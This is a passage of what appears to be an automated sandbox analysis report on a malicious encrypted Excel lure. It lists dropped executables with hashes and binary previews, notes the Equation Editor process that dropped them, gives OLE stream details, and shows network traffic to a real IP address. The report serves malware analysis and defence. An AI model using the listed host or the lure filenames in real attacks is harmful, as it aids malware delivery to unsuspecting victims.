                                                                  SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                  MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                  SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                  SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                  SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8E50EB0.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):84203
                                                                  Entropy (8bit):7.979766688932294
                                                                  Encrypted:false
                                                                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF6436D2.emf
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                  Category:dropped
                                                                  Size (bytes):7608
                                                                  Entropy (8bit):5.091127811854214
                                                                  Encrypted:false
                                                                  SSDEEP:96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
                                                                  MD5:EB06F07412A815AED391F20298C1087B
                                                                  SHA1:AC0601FFC173F50B56C3AE2265C61B76711FBE01
                                                                  SHA-256:5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
                                                                  SHA-512:38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
                                                                  Malicious:false
                                                                  Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I....................................................v.Ze..............%f^..................Y...Y.'.wq....\.....Y.......Y.@.Y.W.wq......Y..6.v_.wq......wq.Ze.4.g^..Y...f^0.g^......g^..f^........4.g^@.Y...f^......f^..........g^..Y.......g^4tf^..g^............<..u.Z.v.....Ze......Ze........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD088ACD.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):49744
                                                                  Entropy (8bit):7.99056926749243
                                                                  Encrypted:true
                                                                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFD606D5.emf
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                  Category:dropped
                                                                  Size (bytes):648132
                                                                  Entropy (8bit):2.8124530118203914
                                                                  Encrypted:false
                                                                  SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                                                                  MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                                                                  SHA1:F677467423105ACF39B76CB366F08152527052B3
                                                                  SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                                                                  SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                                                                  Malicious:false
                                                                  Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                  C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                  Process:C:\Users\Public\vbc.exe
                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64672
                                                                  Entropy (8bit):6.033474133573561
                                                                  Encrypted:false
                                                                  SSDEEP:768:PedoViadPL1DI9WzutSjeJan8dBhF541kE6Iq8HaVxlYDKz4yqibwEBbr:XiaFJkobMa8dBXG2zbVUDKz4yq3EBbr
                                                                  MD5:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                  SHA1:017801B7EBD2CC0E1151EEBEC14630DBAEE48229
                                                                  SHA-256:5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
                                                                  SHA-512:9670AC5A10719FA312336B790EAD713D78A9999DB236AD0841A32CD689559B9F5F8469E3AF93400F1BE5BAF2B3723574F16EA554C2AAF638734FFF806F18DB2B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: Purchase Order Price List.xlsx, Detection: malicious, Browse
                                                                  • Filename: Quote QU038097.doc, Detection: malicious, Browse
                                                                  • Filename: 6Cprm97UTl.xls, Detection: malicious, Browse
                                                                  • Filename: Payment_Confirmation_Slip.xlsx, Detection: malicious, Browse
                                                                  • Filename: Overdue Invoice.xlsx, Detection: malicious, Browse
                                                                  • Filename: Quotation.xlsx, Detection: malicious, Browse
                                                                  • Filename: ENCLOSE ORDER LIST.xlsx, Detection: malicious, Browse
                                                                  • Filename: PO INV 195167 & 195324.xlsx, Detection: malicious, Browse
                                                                  • Filename: Bank letter.xlsx, Detection: malicious, Browse
                                                                  • Filename: Quotation.xlsx, Detection: malicious, Browse
                                                                  • Filename: PO 19030004.xlsx, Detection: malicious, Browse
                                                                  • Filename: New PO PO20.xlsx, Detection: malicious, Browse
                                                                  • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                  • Filename: RFQ 00112.xlsx, Detection: malicious, Browse
                                                                  • Filename: inquiry.xlsx, Detection: malicious, Browse
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.W..............0.................. ........@.. ....................... ......k.....`.....................................O.......8................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H........A..`p...........................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.;...}S......i.>...}T......i.>...}U.....+m...(....o......r]..p.o ...,..{T.......{U........o!....+(.ra..p.o ...,..{T.......
                                                                  C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                                                  Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                  File Type:ISO-8859 text
                                                                  Category:dropped
                                                                  Size (bytes):8
                                                                  Entropy (8bit):3.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:FA3n:M
                                                                  MD5:2EBE3955A49AD21463B3FA81325FAE9D
                                                                  SHA1:8A70B8494E579301B9E4D998EAC9D93A9044452D
                                                                  SHA-256:79075C30BBDB1408DC286CCBF49F38E510D17811D15416B833B74829978D6579
                                                                  SHA-512:121C86EE0C3459C7311EA014E68077C2C5B610B9FBA8078FA142FD9BB95A5A6E7AAF33650EC4366A74592D6BA20B877550E48A712503E8A4B6B0717F1EFC8AEA
                                                                  Malicious:true
                                                                  Preview: .m%.X+.H
                                                                  C:\Users\user\AppData\Roaming\win33.exe
                                                                  Process:C:\Users\Public\vbc.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):734208
                                                                  Entropy (8bit):7.833756558737052
                                                                  Encrypted:false
                                                                  SSDEEP:12288:iRqIue16rc2fV5hZcK1KjkiZCx7jsFuR6Y/ctiBHkcpZtoMZ:AqIue1kff/ECKwiZCx34mcC9LtoMZ
                                                                  MD5:EB43B3C033BD76B51B90A51A6726A81C
                                                                  SHA1:0D39FFCF64ED4F38EA83A72D726D40881F583014
                                                                  SHA-256:4E9A5CC90F1D17550208942E0182E9A99598C18C19B3467C184A46F4214755E2
                                                                  SHA-512:7EFB598153F2C4760FE17F7EF6510F5A48482027434B303A93439BD4C472C3D4E676E3BB8AED268277696F834DC93EA8853481D94C5FACAF61BECF4A23C17A8C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Roaming\win33.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 30%
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................(...........G... ...`....@.. ....................................@.................................PG..K....`..`............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...`....`.......*..............@..@.reloc...............2..............@..B.................G......H........S.. ;..............2............................................0.......... ........8........E....}...).......I.......8x...(....8....8t... ....~....9....&8.....:4... ....~a...:....& ....8....8/... ....~{...:....&8....(.... ....~*...9p...&8f....:....8....*8....8.......*....(....*..(0...*&~.......*...~....*..0..t........(.... ....~!...:....& ....8....8........E.... .......8....*8.... ....~q...:....&8.......9....&&8....8....}....8....~...9....8....&{....8....&8....*~...
                                                                  C:\Users\user\Desktop\~$Ref 0180066743.xlsx
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):330
                                                                  Entropy (8bit):1.4377382811115937
                                                                  Encrypted:false
                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                  Malicious:true
                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  C:\Users\Public\vbc.exe
                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):734208
                                                                  Entropy (8bit):7.833756558737052
                                                                  Encrypted:false
                                                                  SSDEEP:12288:iRqIue16rc2fV5hZcK1KjkiZCx7jsFuR6Y/ctiBHkcpZtoMZ:AqIue1kff/ECKwiZCx34mcC9LtoMZ
                                                                  MD5:EB43B3C033BD76B51B90A51A6726A81C
                                                                  SHA1:0D39FFCF64ED4F38EA83A72D726D40881F583014
                                                                  SHA-256:4E9A5CC90F1D17550208942E0182E9A99598C18C19B3467C184A46F4214755E2
                                                                  SHA-512:7EFB598153F2C4760FE17F7EF6510F5A48482027434B303A93439BD4C472C3D4E676E3BB8AED268277696F834DC93EA8853481D94C5FACAF61BECF4A23C17A8C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 30%
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................(...........G... ...`....@.. ....................................@.................................PG..K....`..`............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...`....`.......*..............@..@.reloc...............2..............@..B.................G......H........S.. ;..............2............................................0.......... ........8........E....}...).......I.......8x...(....8....8t... ....~....9....&8.....:4... ....~a...:....& ....8....8/... ....~{...:....&8....(.... ....~*...9p...&8f....:....8....*8....8.......*....(....*..(0...*&~.......*...~....*..0..t........(.... ....~!...:....& ....8....8........E.... .......8....*8.... ....~q...:....&8.......9....&&8....8....}....8....~...9....8....&{....8....&8....*~...

                                                                  Static File Info

                                                                  General

                                                                  File type:CDFV2 Encrypted
                                                                  Entropy (8bit):7.995449899424773
                                                                  TrID:
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                  File name:Ref 0180066743.xlsx
                                                                  File size:1250304
                                                                  MD5:dffc9e820070887fd0e4a4973e847a36
                                                                  SHA1:32c5185f4aa508cc60ad331e4b3046dce732135c
                                                                  SHA256:9d7b5114111ce6382d022e2e43344b2608db07ecbbf13da758dd220e8df90394
                                                                  SHA512:619c5af981e220ee0caf478bc931ff61608b97482beb5b688df8e4ffbb9045c196300db763f09be702fe65c0eb9a9c3591f6d61a1afc289236a658b7f67b1a20
                                                                  SSDEEP:24576:ePrkOTZ/gbYRYYQjrX/4k0msjwet+bybolCT6ntNMdVGPyB:Arx/gbYRY9X/4k0ms7+OGCsoa0
                                                                  File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                                                  File Icon

                                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                                  Static OLE Info

                                                                  General

                                                                  Document Type:OLE
                                                                  Number of OLE Files:1

                                                                  OLE File "Ref 0180066743.xlsx"

                                                                  Indicators

                                                                  Has Summary Info:False
                                                                  Application Name:unknown
                                                                  Encrypted Document:True
                                                                  Contains Word Document Stream:False
                                                                  Contains Workbook/Book Stream:False
                                                                  Contains PowerPoint Document Stream:False
                                                                  Contains Visio Document Stream:False
                                                                  Contains ObjectPool Stream:
                                                                  Flash Objects Count:
                                                                  Contains VBA Macros:False

                                                                  Streams

                                                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                  General
                                                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                  File Type:data
                                                                  Stream Size:64
                                                                  Entropy:2.73637206947
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                  General
                                                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                                                  File Type:data
                                                                  Stream Size:112
                                                                  Entropy:2.7597816111
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                  General
                                                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                  File Type:data
                                                                  Stream Size:200
                                                                  Entropy:3.13335930328
                                                                  Base64 Encoded:False
                                                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                  General
                                                                  Stream Path:\x6DataSpaces/Version
                                                                  File Type:data
                                                                  Stream Size:76
                                                                  Entropy:2.79079600998
                                                                  Base64 Encoded:False
                                                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1236152
                                                                  General
                                                                  Stream Path:EncryptedPackage
                                                                  File Type:data
                                                                  Stream Size:1236152
                                                                  Entropy:7.99983137636
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . ^ M { B = . 7 K . $ . . . . 8 . . * . . S . . . . a . . . . . . T . . . ^ . . % . . " s . . . . . . . o . . . . B . i . , . . * . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # }
                                                                  Data Raw:ae dc 12 00 00 00 00 00 5e 4d 7b 42 3d 0f 37 4b 8b 24 aa 1e fb c0 38 07 99 2a 9b f9 53 c3 c5 99 0c 61 cc dc ad 00 d2 12 54 ae a8 a3 5e ff d1 25 cc cf 22 73 12 b9 06 e5 fb e6 da 6f 86 f2 e9 ca 42 a7 69 13 2c 18 e7 2a 1c 71 e7 73 9e 03 23 7d 60 d2 32 0f 84 7b a5 01 1c 71 e7 73 9e 03 23 7d 60 d2 32 0f 84 7b a5 01 1c 71 e7 73 9e 03 23 7d 60 d2 32 0f 84 7b a5 01 1c 71 e7 73 9e 03 23 7d
                                                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                  General
                                                                  Stream Path:EncryptionInfo
                                                                  File Type:data
                                                                  Stream Size:224
                                                                  Entropy:4.56771105117
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . j . . . O . . . R W . . * . a . . . . 5 . . . . . > . . . . X 2 . . . . . . X ( . . . . m _ X O . u \\ . r . . . . . . . . . . : [ . . L
                                                                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jun 9, 2021 08:04:56.928414106 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.064789057 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.064953089 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.065510035 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205565929 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205605984 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205631018 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205636024 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205655098 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205658913 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205662012 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205681086 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205688953 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205704927 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205705881 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205732107 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205737114 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205756903 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205761909 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205785036 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205789089 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205809116 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205815077 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205838919 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.215353012 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342072964 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342111111 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342137098 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342159033 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342180014 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342197895 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342211008 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342216015 CEST8049167198.12.127.155192.168.2.22
